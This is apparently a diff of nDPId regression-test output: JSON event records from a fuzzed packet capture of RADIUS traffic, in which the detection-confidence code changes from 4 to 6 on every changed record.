-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1528996068284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1528996068284,"pkt":"ABRP+4rqcNuYVcUnCABFAADz7eFAAPwRZdbG4hk1CgxAHgcUchAA39JxAwsA1+U\/DuIEVKatp1a5Vz8iUQkBNTAzMTE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAubaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996520702} 
01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996068284,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1528996520912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528996520912,"pkt":"AFFP+4rqcNuYVcUnCABFAADh9PZAAPwRXtPG4hk1CgxAHgcUchAAzf\/ACwwAxUX8kZJ5SD1GIY9b3TLnaCUBNTAzMTEjODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2T0oBAgBIFwEAAAEFAACzfR5W9eh2OghNxDwVbojaAgEAABPTIXEVtgAALhLyMDDdAueLAQACCwUAJQD\/wh144KSIGN1E2YBCoTFQEji6recwpo2EGDX0tsWSQ1s="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996521324,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01361{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1528996521324,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528996521324,"pkt":"AAAMB6xAABRP+4rqCABFAALHIMlAAP8RAAAKDEAexuIZNXIQBwQCswAAAQ0CqzlVBXH\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"} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528996068129,"flow_last_seen":1528996521508,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528996068129,"flow_last_seen":1528996521508,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1528996603395,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996603395,"pkt":"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"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996603490} 00482{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":147,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":147,"pkt_l4_len":0,"thread_ts_msec":1528996603395,"pkt":"ABRP+4qfcNuYqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1528996609526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":876,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":876,"pkt_l4_len":842,"thread_ts_msec":1528996609526,"pkt":"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"} 
@@ -40,10 +40,10 @@ 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1528996680808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528996680808,"pkt":"ABRP+4rqcNuYVcUnCABFAADA98dAAPwRXCPG4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1528996684582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996684582,"pkt":"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"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1528996689402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528996689402,"pkt":"ABRP+4rqcNuYVcUnCABFAAClbuVAAPwRXCDG4hk1CgxAHgcUclYAkWdmCxcAiQrIitkB1LgR0s5zEPVzzzIBNTAzMTE0dzAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDgvNjQ6YjA6YTY6MGU6YTQ6ZWMvMjEyTw4BAAAMFwwAAHYBf\/xQEjLibctMfYgZSgHqxKHsV1U="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528996689587} 00561{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996689524,"pkt":"ABRP+4rqcNuYVcUnCABFAADA9+klAPwRXAHG4hk1CgxAHgcUchAArPtqAxgApNkk5fehx32PqouJEXUDfwgBNTAzMTE0ODAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDkvNjQ6YjA6YU06uGU6YTQ6ZWMvMjEyeCIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8lAAEABwBQEslNLvLV5rc9WbdNXraRxZQ="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996733156,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -54,29 +54,29 @@ 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996736731,"pkt":"ABRP+4rqcNuYVcUnCABFAADA+HNBAPwRW3fG4hk1CgxAHgcUchAArIw9AxwApBZ8i1l5y5I6R7UN7fbGLQ0BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLhNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2PpYjA6OWY6YmE6NGE6MGU6N2UvMjEzEiIzMjc2NCBTdWJzY3JpYmVyJWlvdCBwcm92aXNpb25lZE8HBAEABwBQEhu6bMXdvKMo\/pphwZK5oRM="} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1528996068129,"flow_last_seen":1528996740339,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":9322,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1528996068129,"flow_last_seen":1528996740339,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":9322,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 